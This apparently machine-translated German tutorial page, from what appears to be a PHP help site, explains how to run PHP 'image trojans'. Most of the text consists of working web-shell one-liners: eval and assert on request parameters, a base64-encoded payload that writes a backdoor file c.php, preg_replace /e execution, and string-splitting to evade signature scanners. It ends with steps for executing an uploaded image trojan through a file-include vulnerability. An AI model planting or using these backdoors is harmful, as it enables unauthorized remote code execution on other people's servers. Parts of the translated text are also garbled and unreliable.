So führen Sie einen PHP-Image-Trojaner aus
1. Standard-Schreibmethode, PHP-Code direkt über eval ausführen
@eval ($_POST['code']);
2. Führen Sie Assert dynamisch aus, um eine Trojaner-Datei zu generieren (die beste versteckte)
@$_GET['a']($_GET['code']);
3. Verwendung: von der URL aus In den folgenden Parametern und beim Ausführen wird eine c.php-Datei im aktuellen Verzeichnis generiert
/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};Wenn der a-Parameter eval ist, wird ein Fehler gemeldet (da eval kein a ist). Die Trojaner-Generierung schlägt fehl und es wird derselbe Fehler gemeldet, es wird jedoch ein Trojaner generiert.
4. Verwenden Sie preg_replace, um den Code auszuführen (verwenden Sie einfach eine beliebige Zeichenfolge davor. Wenn diese unterschiedlich ist, kann der Befehl mehrmals ausgeführt werden)
@preg_replace("/re/e", $_POST['code'], "re");5. Teilen Sie die Signaturen auf
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
6. Benennen Sie eine beliebige Datei um
$reg="c"."o"."p"."y"; $reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
So nutzen Sie die Include-Schwachstelle
Manchmal laden wir einige Image-Trojaner hoch, aber sie können nicht ausgeführt werden. Wenn eine Include-Schwachstelle vorliegt, können die Image-Trojaner ausgeführt werden.
Wenn es im PHP-Code ein include($_GET['controller']) und einen URL-Pfad gibt: /index.php?controller=user, scheint dies ein entsprechendes Steuerelement zu sein, das darauf basiert die Parametereinbindung Der Code des Servers, aber wenn die Parameter im URL-Pfad wie folgt geändert werden: /index.php?uid=/upload/images/muma.jpg, wird der Trojaner zu diesem Zeitpunkt ausgeführt.
Der obige Inhalt dient nur als Referenz!
Empfohlenes Tutorial: PHP-Video-Tutorial
Das obige ist der detaillierte Inhalt vonSo führen Sie einen PHP-Image-Trojaner aus. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!
So öffnen Sie eine PHP-Datei
So entfernen Sie die ersten paar Elemente eines Arrays in PHP
Was tun, wenn die PHP-Deserialisierung fehlschlägt?
So verbinden Sie PHP mit der MSSQL-Datenbank
So verbinden Sie PHP mit der MSSQL-Datenbank
So laden Sie HTML hoch
So lösen Sie verstümmelte Zeichen in PHP
So öffnen Sie PHP-Dateien auf einem Mobiltelefon
![Erste Schritte mit der praktischen PHP-Entwicklung: Schnelle PHP-Erstellung [Small Business Forum]](https://img.php.cn/upload/course/000/000/035/5d27fb58823dc974.jpg)
![[Web-Frontend] Node.js-Schnellstart](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
